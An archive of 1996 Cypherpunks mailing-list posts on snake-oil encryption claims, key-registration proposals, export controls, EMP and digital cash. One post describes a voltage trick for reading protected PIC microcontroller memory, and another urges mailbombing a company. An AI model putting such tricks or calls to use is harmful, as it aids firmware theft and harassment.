In-Reply-To: <Pine.LNX.3.91.960618113856.32248D-100000@user1.scranton.com>
Message-ID: <Pine.LNX.3.93.960618160657.1635A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jun 1996, Moroni wrote:

>       Hi,
>           Didn't I read that with the new Applied Cryptography there was a 
> diskette or cd included that had all the programs on it? I noticed a copy 
> at the B Dalton and when I looked at it it contained no cd or diskette. 
> Was the aforementioned new edition with disk/cd a limited edition 
> available through the mail only?

	I just purchased Applied Cryptography yesterday, and it included
no disk. There was mention of a disk, and the author noted that the disk
couldn't be shipped overseas due to ITAR restrictions, so I assumed that
the disk wasn't included so that the book could be shipped overseas with
out difficulty.  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 19 Jun 1996 11:57:07 +0800
To: "M.Wagoner (1)" <safemail@ntrnet.net>
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606181250.IAA00625@ns1.ntrnet.net>
Message-ID: <Pine.SUN.3.93.960618154407.20055A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jun 1996, M.Wagoner (1) wrote:

> Thanks for responding.

You're lucky I even bothered to take the two minutes it required to do
that.

> >> We would like someone to be able or should I say try and crack our
> >> encryption. IT IS IMPOSSIBLE.
> >
> >With the above you have saved me the trouble of even trying.
> 
> 
> I can understand your reaction but this is a brand new approach to
> crypotrography that no one else has thought about doing.

Any approach to "cryotrography" [sic] which includes absolute statements
about unbreakability (like your quote above) betrays such ignorance about
the nature of the science as to render it a literal glowing neon brand on
your forehead reading :DO NOT PURCHASE CRYPTO FROM THIS MAN: and
accompanied by a loud speaker repeating same at 100dB.

Using cow feces to encrypt messages is also a brand new approach which no
one else has thought about doing.  That hardly means it is worth more than
the feces itself.

> >Your appraoch to cryptography betrays such ignorance that nothing which
> >your "corporation" produces could be of the slightest redeeming value.
> >
> >(Bloody snake oil venders)
> >
> >Now go away.

> I really wish I knew what you meant by this. If I made you upset, I apoligize.

It means I consider your product dirt.  Cryptography is about economics.
I'm not going to spend time teaching you the tenants of the science
itself though it is clear you need such a lecture.  Try reading "Applied
Cryptography" for starters.

Calling a given cypher "uncrackable" is simple fiction or ignorance.

I might add that I am an attorney licensed to practice in the District of
Columbia, among other jurisdictions.  Having looked at your web page and
the comparisons you make to PGP I can tell you without much qualification
at all that it is at worst defamation and fraud.  I would not at all be
surprised to find that each sale of product you make constitutes a count
of wire fraud (18 U.S.C.A. sections 1341, 1343) and a count of mail fraud
if the product is shipped via the mails.  I also believe that ViaCrypt and
whoever else may have claim to the rights to market PGP commercially has a
clear action of defamation, tortious interference with contract and
depending on the state, unlawful sales interference.  The fraud element
would activate punative damages provisions.

Should any of these parties come to me asking for advice I would direct
them immediately to the nearest courthouse.

Tell me, is your "corporation" licensed to do business in any state?  Is
it licensed as a corporation?  Limited Liabiltiy? Many states impose
sanctions, including administrative disolution and fines, for the use of
misleading corporate forms or names while conducting interstate commerce
(which you are clearly doing).

> >> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> >Clearly a waste of good storage space.
> >
> Again thanks for your comments.

Mr. Estridge, were I your attorney, and I thank my lucky stars that I am
not, I would suggest that you post a retraction immediately, and forward a
very polite letter of apology to ViaCrypt and perhaps Mr. Zimmerman.

Maybe they are too busy to sue you, report you to the better business
bureau, the FTC, or the state attorney general and the postmaster.

> >> Randy Estridge
> >> SafE Mail Corporation  

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 19 Jun 1996 11:20:08 +0800
To: safemail@ntrnet.net
Subject: Safemail
Message-ID: <Pine.SUN.3.93.960618161653.20055B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




If the below is accurate, your company is in even more trouble.  I do hope
no one would think of RECORDING a conversation with a safemail
represenative.  I admit that it would be valuable to an attorney looking
to sue Safe Mail, but it's not a very nice thing to do.  Even if its
legal. (which it would be in most states).

---------- Forwarded message ----------
Date: Tue, 18 Jun 1996 08:39:12 -0500
From: Scott Schryvers <schryver@radiks.net>
To: cypherpunks@toad.com
Subject: Snake_Oil_punks was Re: SafE Mail Corporation

Talked with Randy of Safe Mail Corporation on the phone.  

Among the stuff he claimed was that

        PGP has the secret key in its public key!

        Found out that not only does this algorithm use 22 characters.  
        The characters are the ones only found on the keyboard.

        SafeMail uses a proprietary Russian algorithm.

        
Not only is this company misquoting it's making up as it goes along. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tmpeters@calvanet.calvacom.fr (TM Peters)
Date: Wed, 19 Jun 1996 04:59:33 +0800
To: cypherpunks@toad.com
Subject: Federal key registration agency
Message-ID: <199606181427.QAA10162@ns.calvacom.fr>
MIME-Version: 1.0
Content-Type: text/plain


Compuserve Online Today Daily Edition, 15 June 1996:

Attorney General Janet Reno is advancing a plan to establish a new agency
overseeing all digital encryption, saying that would make it tougher for
criminals and terrorists to use the Internet to carry out crimes.

Speaking to the Commonwealth Club of California in San Francisco, Reno said
her plan would require people to register with the new agency the secret
codes -- or "keys" -- they use to encrypt messages online.

Reporting on this speech, Sandra Ann Harris of United Press International
adds, "Federal authorities could then obtain the information they need to
decipher the encryptions using a court order and secretly monitor electronic
communication on the Internet the same way wiretaps are used to monitor
telephone conversations of suspected criminals."

Reno added, "We look only to make existing law apply to new technology,"
adding new computer programs designed to crack the new complicated
encryptions take too long to be useful to law enforcement.  "Some of our
most important prosecutions have depended on wire taps."

She also said registration of keys might end up being a worldwide
requirement, since the Internet is used increasingly for international
communication, commerce, and criminal enterprise.

Reno told the group that effectively regulting electronic encryption will
depend on fiding a blance between protecting privacy interests while
stopping criminals from cashing in on the new technology.

"If we do our job right citizens will enjoy the Information Age without
being victimized" by high technology, Reno said.

United Press International
Charles Bowen
  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 19 Jun 1996 11:41:05 +0800
To: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Subject: Re: Micropayments, Anarchy, It's All The Same... ;P
Message-ID: <2.2.32.19960618205114.0098dd20@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 6/18/96 -0700, Stephan Vladimir Bugaj wrote:

>How the market diverges from the polit is clear.  The market is only concerned
>with consumers, and this leaves out the poor, who are undeniably part of the
>polity.

The poor are consumers and indeed can regularly outbid the middle class and
rich for resources (if they couldn't, poor neighborhoods would never grow in
size but they do all the time.)

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Wed, 19 Jun 1996 12:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: Snake_Oil_punks was Re: SafE Mail Corporation
Message-ID: <199606182152.QAA04586@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


[Snake oil alert!]
 
>         PGP has the secret key in its public key!
> 
>         Found out that not only does this algorithm use 22 characters.  
>         The characters are the ones only found on the keyboard.
> 
>         SafeMail uses a proprietary Russian algorithm.
> 
> Not only is this company misquoting it's making up as it goes along. :)
> 
> 

Okay, then I hereby claim the secret key 1234567890qwertyuiop+- as
my public key.  Now, by running that through the SafeMail
Russian algorithm, I get "Nyet!"

Would somebody please give these chums a clue or two, or
mailbomb their sorry asses, or something?


dave




----- David E. Smith, dsmith@prairienet.org
PO Box 324 Cape Girardeau MO USA 63702-0324
http://www.prairienet.org/~dsmith/dave.html
"fighting ultimate cosmic evil...
           ... one bean burrito at a time."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 19 Jun 1996 17:10:40 +0800
To: cypherpunks@toad.com
Subject: Recipients get the postage
Message-ID: <199606190005.RAA18148@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was reading old threads on remailers, where various ideas were
suggested to reduce abuse.  One was to charge postage, in order to
discourage spam and somewhat discourage nastygrams, as well as to
compensate the remailer operator for his risks.  A variant was to tell
the recipient that he had anonymous mail waiting, and possibly charge him
to receive it.

I had a different idea, which has probably been suggested before: make
the sender of the anonymous mail pay, but pass the money to the
recipient.

All my complaints come from people who have received mail, never from
people who have sent it.  So obviously the steps we take need to make
recipients happier.  Paying them is one way to do it.

Of course there are lots of details: how much should be charged, will
recipients really be so thrilled when a "fuck you" note has a nickel
wrapped in it, how will they cash their checks, etc.  If ecash
were used this might be a motivation for people to open an account.

Nym servers could be funded by the nym owners to pay for a certain number
of messages.  Since the nym owner ends up receiving the cash it doesn't
actually cost him anything and he can easily afford to keep a pool of
cash in the nym server to keep the messages coming through.

Remailers which wanted to apply this rule would have to deposit the money
and immediately withdraw the same amount to include in the outgoing mail.
Users would basically have to trust the remailers to do this honestly.
Maybe it only needs to be done when the mail goes to a non-remail end
user destination, not for the intermediate links in the chain.

Postings to newgroups and mailing lists would make the cash available to
the first one who grabs it.  It can be a fun game; we've done it here
occasionally.  This might also motivate people to sign up for ecash.

Just a thought -

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMcdENBnMLJtOy9MBAQFbpAH+NCq3HMN4+ar6UVWBFxvhAQ2OCu+EehX7
CgnLButTRJEM4OdOEsBaLzYBdi5bk0acelSpE/Zqj1S46bD2UQt50w==
=2NAN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 19 Jun 1996 08:08:38 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Snake_Oil_punks was Re: SafE Mail Corporation
In-Reply-To: <199606181421.KAA28339@toxicwaste.media.mit.edu>
Message-ID: <Pine.PCW.3.94.960618172346.2103D-100000@CISPPP>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 18 Jun 1996, Derek Atkins wrote:

> > Talked with Randy of Safe Mail Corporation on the phone.  
> >         PGP has the secret key in its public key!
> 
> Huh?  Can you explain what this means?  I'd sure like to know.

It's obvious, silly. The public key exponent has the private key exponent
embedded in it,  information theory and modular arithmetic be damned :)

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 19 Jun 1996 15:40:56 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <960618175621_137771316@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-18 02:34:54 EDT, sandfort@crl.com (Sandy Sandfort)
writes:

<< C'punks,
 
 At 05:21 PM 6/17/96 -0400, M.Wagoner (1) wrote:
 >
 >We would like someone to be able or should I say try and 
 >crack our encryption. IT IS IMPOSSIBLE.
 
 >Our Web site is http://www.sfmc.com  Phone number is 
 >1-800-252-9938.
 
 So I pulled up the Web site to see what sort of reward they
 offered to the successful cracker.  Under the heading 
 "Attention `Hackers'" they said if you crack their 
 unbreakable SafE Mail code, you get 5 free copies of ...
 SafE Mail!  Oh, that's a really primo prize, broken 
 software.  Duh.
 
 Since cracking their encryption is IMPOSSIBLE, I suggest 
 they make the stakes interesting--$100,000, or hell, a cool
 million.  After all, it's unbreakable.  It's not like they
 will have to pay up or anything.
 
 
  S a n d y
  >>
Very good point. Hell I have a book that offers $1,000 to crack a little
string.
How much does everyone here actually talk about the techniques of
decryption?? Is is something any of you are well versed at and would welcome
any questions to?
Thanks.....
                Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris.liljenstolpe@SSDS.com (Christopher Liljenstolpe)
Date: Wed, 19 Jun 1996 10:43:33 +0800
To: safemail@ntrnet.net (M.Wagoner (1))
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606172121.RAA00883@ns1.ntrnet.net>
Message-ID: <31c7022a.17827605@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Please get a clue before designing crypto or allowing your marketing
people loose on the net.

This smells of snake-oil and your pages are full of inacuracies:

1) What is Internet-compatable (PGP works fine over the net, but it is
not).  If you mean RFC or other standard compatable (i.e. MOSS,
S/MIME, PEM), you aren't conformant to any standards.

2) 22 character Public keys are a joke

3) No crypto system is unbreakable unless you are doing some
permutation of OTP.  Public key systems are definately compromisable
with the appropriate application of compute power.

If you do not have a clue, don't play with those that do.



On Mon, 17 Jun 1996 17:21:36 -0400, the sage safemail@ntrnet.net
(M.Wagoner (1)) scribed:

>
>We would like someone to be able or should I say try and crack our
>encryption. IT IS IMPOSSIBLE.
>
>
>
>
>Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
>
>
>
>Randy Estridge
>SafE Mail Corporation  
>
>


--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Wed, 19 Jun 1996 18:46:44 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registrat
Message-ID: <TCPSMTP.16.6.18.-13.50.54.2780269260.1176890@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:jimbell@pacifier.com to Harka <=-
 
 > "Some of our
 >most important prosecutions have depended on wire taps."

 In> But is the average citizen substantially impacted by crimes that would
 In> be  assisted by good encryption?  Probably not.  
 
 And how about: "Would not the average citizen be assisted by good encryption to NOT be impacted by (certain) crimes?"
 And from that perspective, shouldn't the protection of millions of "average" citizens have much more importance than the "unprotection" (i.e. Clipper) of a few godfathers, who _might_ use e-mail and who _might_ use crypto?
 
 
 >Reno told the group that effectively regulating electronic encryption will
 >depend on finding a balance between protecting privacy interests while
 >stopping criminals from cashing in on the new technology.

 In> I see no need for a "balance."  I think that the advent of good
 In> encryption  has the effect of increasing the security of individuals.
 
 
 Absolutely. As somebody a few days ago already mentioned in connection with the CDA, the gov.'s have enjoyed a lot of centralized power so far. A medium like the Net is the antithesis to that kind of centralization. Now all over the world gov.'s try to
 hold on to the "old" way, which _only_ works if things are regulated, censored, outlawed etc.. That is what ensures the survival of centralized and hierarchical structures.
 But they are failing to realize, that people's conciousness changes _away_ from such limiting ways towards more open and natural relationships. The Net is maybe the (currently) most important medium in that process and will be hopefully the last nail in 
 the coffin of governments, as we know 'em.


 Harka

... "If cryptography is outlawed, no outlaw will use clipper" -:)
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 19 Jun 1996 17:55:13 +0800
To: cypherpunks@toad.com
Subject: Digital Cash application
Message-ID: <199606190339.UAA07400@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


In 1996, the Libertarian Party will apparently qualify for Federal matching 
funds for its Presidential political campaign.  That does not mean that it 
will _accept_ them, being stolen goods.  However, a few years ago I heard of 
an idea that they should accept the money, and return it to the people, a 
small amount at a time, to whomever asks for it.  Besides returning the 
stolen money to its rightful owners, that would produce substantial positive 
publicity for the Libertarian party, embarrassment for the Democrats and 
Republicans, while at the same time reducing the amount of money available 
for the D's and the R's.


But there's been a practical question of how to actively do this, 
economically.  Issuing checks and mailing them costs money, and they're 
traceable, etc.    The advent of digital cash suggests an answer: Make the 
payments in the form of digital cash, payable on the Web.  This will 
encourage the use of digital cash, and provide a sudden infusion that will 
promote other uses.  There's another advantage, however.  Since "Netizens" 
are somewhat biased towards libertarianism, this will have the effect of 
keeping more of this money "in the family" as it were, while at the same 
time being open, technically, to everyone who can get on the 'net. 


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Wed, 19 Jun 1996 21:04:50 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registration agency
Message-ID: <199606190505.WAA12079@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>Compuserve Online Today Daily Edition, 15 June 1996:
>
>Speaking to the Commonwealth Club of California in San Francisco, Reno said
>her plan would require people to register with the new agency the secret
>codes -- or "keys" -- they use to encrypt messages online.
>
>Reporting on this speech, Sandra Ann Harris of United Press International
>adds, "Federal authorities could then obtain the information they need to
>decipher the encryptions using a court order and secretly monitor electronic
>communication on the Internet the same way wiretaps are used to monitor
>telephone conversations of suspected criminals."

   Consider the logic of this statement.  If some *criminal* has registered his/her secret key with the government, then why the hell would s/he then encrypt an incrimating message knowing the government could crack it?!
   Great plan, Janet.....


Medea







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 19 Jun 1996 19:48:38 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Class III InfoWar: TST Article
Message-ID: <aded506700021004a6bc@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:15 AM 6/18/96, Moroni wrote:
>    What are the effects of an EMP on the persons releasing the bomb
>,those in te vacinity and what is the distance that the bomb has a
>physical effect on people. Also ,is there any knowledge of reusable EMP
>bombs yet?
>                              TIA
....
Interesting idea. I have no idea about impact on humans.
The capacitor connected to some wierd shape antenna all assembled in
a vacuume to muffle the sound upon discharge would probably be
reusable. It also probably provides only a fraction of the energy of
a high explosive version.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 19 Jun 1996 21:25:54 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Applied Cryptography disks / EMP noise.
Message-ID: <199606190619.XAA07271@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 AM 6/18/96 -0400, you wrote:
>      Hi,
>          Didn't I read that with the new Applied Cryptography there was a 
>diskette or cd included that had all the programs on it? I noticed a copy 
>at the B Dalton and when I looked at it it contained no cd or diskette. 
>Was the aforementioned new edition with disk/cd a limited edition 
>available through the mail only?

If you look at the inside back cover of the book you'll find
instructions for ordering the diskette, just as there were with
Edition 1.  Distributing the diskette with the book was too much trouble for
the publisher, given the ITAR issues.  The disks that Phil Karn applied
for export permission for had just the code from the book typed in,
and not any other material that may have been on the official disks,
but they still denied it.

As far as EMP goes, there are three interesting kinds of EMP generators
1) Nuclear weapons, detonated at high altitude to get wide spread
        EMP effects.  The folks who drop such things generally
        clear out of the territory very fast before the explosion.
2) Mythical portable devices for attacking computer facilities -
        the folks who set off these don't exist, so they don't
        need to worry about the effects.
3) Very large capacitor/inductor banks at defense contractors like 
        Harry Diamond Labs in New Mexico, which are used to test
        electronic equipment (up to airplane size) for EMP-resistance.  
        They're supposedly quite impressive structures (the buildings 
        used for the equipment under test are all wood) and the folks
        who run them are careful about lots of things when using them.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 19 Jun 1996 19:53:36 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Federal key registration agency [NOISE]
Message-ID: <199606190619.XAA07277@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 6/18/96 -0500, you wrote:
>> Compuserve Online Today Daily Edition, 15 June 1996:
>> 
>> Attorney General Janet Reno ... said her plan would require people to
>> register with the new agency the secret codes -- or "keys" -- they use 
>> to encrypt messages online.
>
>This would be the "Bad Cop" line, for those playing along at home.

Problem is, she's the one playing Good Cop. :-)


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 19 Jun 1996 19:35:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Fuseable Links - no guarantees??
In-Reply-To: <adeb915b01021004b1a6@[205.199.118.202]>
Message-ID: <199606190641.IAA10766@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| >I recently saw an add for a UK based group that says they can take a PIC
| >OTP micro and read the prom (for a fee, of course) - How the heck is this
| >done??

According to the FAQ for satellite piracy, whatever that is called, it is
quite simple for some models of PICs. 

Many of the OTP PICs have a wipe mode for reusal. Apply a certain voltage,
the programming voltage, and the memory is wiped and a fuse is restored so
the memory is programmable again.

Approx a year ago some people on this scene discovered that one could restore
the fuse without erasing the memory content. They applied the programming
voltage minus 0.5V (or something similar). The idea is that there is a voltage
drop across the fuse, and this modified voltage level just barely "manages
it" across the fuse. The voltage level is however not enough to spark the
memory erasure mechanism off.

So I guess one can look at the circuitry and apply non-standard voltage and
current values, or even non-standard timing values -- and do bad things
to these circuits. So this begs the question: Is there anyone who has looked
at "computer security" issues at this level? Is this just bad implementations
of these circuits or are there a fundamentally hard problem in this?

(I'd guess you'll find the FAQ if you search for the words "satellite piracy
PIC OTP" on Alta Vista.)

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Wed, 19 Jun 1996 22:00:54 +0800
To: cypherpunks@toad.com
Subject: This might be interesting...
Message-ID: <199606190745.JAA21883@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Do an AltaVista Query on:

	url:bmh.com crypto*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Wed, 19 Jun 1996 22:58:37 +0800
To: cypherpunks@toad.com
Subject: German Federal Bank opposes e-cash
Message-ID: <m0uWKRm-0000B2C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


[What follows is my translation of a Reuters news item as seen on a
mailing list.]

"Risks with computer money"

Frankfurt - the Federal Bank has once more warned against security risks
with computer money. There is the danger that "Cyber-Money" stored in
computers be counterfeited, said Directory Board member Edgar Meister
at a conference in Schwaebisch-Hall. In addition there were the danger
of money laundry, because the computer money could be wired across
borders without problems. Meister announced that, if necessary, the EU
Central Banks would take counter-measures, should computer money and
re-loadable payment cards endanger the monetary policy. (rtr/18.6.96)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jun 1996 12:55:03 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registration agency
Message-ID: <v02120d59aded35019abf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:27 6/18/96, TM Peters wrote:

>Speaking to the Commonwealth Club of California in San Francisco, Reno said
>her plan would require people to register with the new agency the secret
>codes -- or "keys" -- they use to encrypt messages online.

The cat is out of the bag. Janet Reno is calling for mandatory Government
Access to Keys. Not that her statement would surprise anyone on this list.
Still, I believe the administration has never before publicly stated that
people will be _required_ to deposit their encryption keys with the
government. I wonder what the penalties for failure to comply with this
requirement will be.

[I have requested a transcript of Reno's speech from the Commonwealth Club.
I will make the relevant parts available as soon as I get it].



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 20 Jun 1996 07:57:05 +0800
To: "'Christian Wettergren'" <cwe@it.kth.se>
Subject: RE: Fuseable Links - no guarantees??
Message-ID: <01BB5DC1.392DE140@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Christian Wettergren[SMTP:cwe@it.kth.se]
Sent: 	Tuesday, June 18, 1996 11:40 PM
To: 	Timothy C. May
Cc: 	cypherpunks@toad.com
Subject: 	Re: Fuseable Links - no guarantees?? 


So I guess one can look at the circuitry and apply non-standard voltage and
current values, or even non-standard timing values -- and do bad things
to these circuits. So this begs the question: Is there anyone who has looked
at "computer security" issues at this level? 

>>> Of course, many have.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 20 Jun 1996 08:55:04 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Cash application
In-Reply-To: <199606190339.UAA07400@mail.pacifier.com>
Message-ID: <4q9cag$lld@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199606190339.UAA07400@mail.pacifier.com>,
jim bell  <jimbell@pacifier.com> wrote:
>But there's been a practical question of how to actively do this, 
>economically.  Issuing checks and mailing them costs money, and they're 
>traceable, etc.    The advent of digital cash suggests an answer: Make the 
>payments in the form of digital cash, payable on the Web.  This will 
>encourage the use of digital cash, and provide a sudden infusion that will 
>promote other uses.  There's another advantage, however.  Since "Netizens" 
>are somewhat biased towards libertarianism, this will have the effect of 
>keeping more of this money "in the family" as it were, while at the same 
>time being open, technically, to everyone who can get on the 'net. 

Well, this has been around for quite a while:

http://www.SkylineMall.com/lpva/donate.html

(it's the Libertarian Party of Virginia; they accept ecash and First Virtual).

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcg0e0ZRiTErSPb1AQFuawQAgmMtM9UK9/X6Yw3mA7I0emxCTBbcetiK
bG6e9U7BCGlXI/FYC7cu0Jcj0DoGM+lRlF84nzhKBsUqL1A1lKYSIEULLxNab5nc
rU/jlYQ5+PalsbO0NdkIugahg1iw6bSjto3xlbWfaoP78QldzDQ+3KoR4+DSxExc
K4fyQMq0zJM=
=lLyl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 20 Jun 1996 12:32:51 +0800
To: cypherpunks@toad.com
Subject: Current status of RSA patent...
Message-ID: <Pine.3.89.9606191052.A14088-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone provide additional information on the RSA patent status? 
If memory serves me, it is due to expire sometime in 1997. 

Also, what are the ramifications of deploying software based around it, 
such as PGP 2.62i (from UK)?

...Paul

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 20 Jun 1996 09:35:39 +0800
To: cypherpunks@toad.com
Subject: Re: German Federal Bank opposes e-cash
In-Reply-To: <m0uWKRm-0000B2C@ulf.mali.sub.org>
Message-ID: <4q9cqs$ln7@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0uWKRm-0000B2C@ulf.mali.sub.org>, Ulf Moeller <um@c2.org> wrote:
>[What follows is my translation of a Reuters news item as seen on a
>mailing list.]
>
>"Risks with computer money"
>
>Frankfurt - the Federal Bank has once more warned against security risks
>with computer money. There is the danger that "Cyber-Money" stored in
>computers be counterfeited, said Directory Board member Edgar Meister
>at a conference in Schwaebisch-Hall. In addition there were the danger
>of money laundry, because the computer money could be wired across
>borders without problems. Meister announced that, if necessary, the EU
>Central Banks would take counter-measures, should computer money and
>re-loadable payment cards endanger the monetary policy. (rtr/18.6.96)

That's very interesting, especially considering Deutsche Bank has signed
on to be an ecash mint (http://www.digicash.com/publish/ec_pres5.html)...

I don't get this worry about counterfeiting.  It would seem to be harder to
counterfeit ecash than paper cash (though, admittedly, it would be harder to
track, but it would almost certainly have to be an "inside job").  Maybe
the journalists are just misinformed, or possibly the banking people?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcg2lEZRiTErSPb1AQHq3gQAtpd9y56lCh1IZT/PErb19LAvgmMwu9G2
PAe7OZdW/e342zRhDbua8hPYCFRnlqEKXjRchsUifn+Nv9ZYp8p8at0CRQdi6PVD
KIEhAv+j4Dhd4KRe4GIAVTfNZKsdBfxrjvm79zNi7se0aYjt6SD612OPzdrVor1n
iNnwMtWUWdM=
=TgGg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Thu, 20 Jun 1996 09:06:12 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: You bet they have/are: NSA/CIA to snoop INSIDE the U.S.???
In-Reply-To: <Pine.SUN.3.93.960618020945.20947B-100000@polaris>
Message-ID: <199606191725.KAA26806@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > It is clear that if the FBI/CIA/NSA/ATF/DoS intercepts a message with
> > some very important content, like, say, I (Ernest Hua) was plotting to
> > kill Hillary, then they can use that information to start investigating
> > my activities, even if the intercept turned out to be illegal.  Those
> > who saw the content of this intercept is not required by law to "forget"
> > that they ever saw it.
> 
> If they intend to prosecute in a U.S. court they are.
>
